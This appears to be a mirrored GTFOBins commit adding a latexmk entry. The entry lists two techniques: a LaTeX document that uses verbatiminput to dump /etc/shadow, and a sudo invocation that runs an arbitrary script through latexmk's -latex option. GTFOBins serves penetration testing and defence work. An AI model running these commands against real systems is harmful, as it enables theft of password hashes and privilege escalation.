mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
ff22bbda93
Add latexmk.
12 lines
396 B
TeX
12 lines
396 B
TeX
description: `latexmk` is a perl script.
|
|
functions:
|
|
file-read:
|
|
- code: |
|
|
echo "\documentclass[12pt]{article} \usepackage{verbatim} \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex
|
|
latexmk read.tex
|
|
strings read.dvi
|
|
sudo:
|
|
- code: |
|
|
echo "PROGRAM > /tmp/result.txt" > /tmp/run.sh
|
|
sudo latexmk -latex="/tmp/run.sh" file.tex
|